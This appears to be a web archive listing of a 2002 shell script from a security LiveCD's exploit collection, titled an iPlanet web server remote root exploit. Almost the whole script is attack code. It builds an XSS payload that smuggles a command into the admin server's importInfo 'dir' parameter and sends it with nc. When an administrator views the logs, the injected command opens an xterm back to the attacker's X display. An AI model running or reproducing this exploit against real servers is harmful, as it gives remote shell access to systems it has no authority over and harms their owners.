home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iplanet / iplanet-ngxss.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-05-13  |  884 b   |  40 lines
  1. #!/bin/sh
  2. #
  3. # iPlanet Remote root exploit
  4. # Tested versions: 4.* up to SP11
  5. #
  6. # By: Fermφn J. Serna CTO, NGSEC
  7. # http://www.ngsec.com <fjserna@ngsec.com>
  8. #
  9. # Madrid, 09/10/2002
  10.  
  11. echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO, NGSEC"
  12. echo "http://www.ngsec.com <fjserna@ngsec.com>"
  13. echo
  14.  
  15. if [ $# != "3" ]
  16. then
  17.  echo "Usage: $0 <Web_Server> <Web_port> <IP_to_send_xterm>"
  18.  exit
  19. fi
  20.  
  21. echo "1.- Setting xhost +$1"
  22. xhost +$1
  23. echo
  24.  
  25. echo "2.- Building XSS string:"
  26. CADENA="<script>window.location=\"/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+$3:0%2500\";</script>"
  27. echo $CADENA
  28. echo
  29.  
  30. echo "3.- Sending HTTP request:"
  31. SEND="GET /$CADENA HTTP/1.0"
  32. echo "$SEND"
  33. (echo "$SEND"; echo "Host: $1"; echo; echo) | nc $1 $2
  34. echo
  35. echo
  36.  
  37. echo "4.- Time to wait for the xterm :P. Admin should review Web Server logs using Admin Server Tool."
  38. echo
  39.  
  40.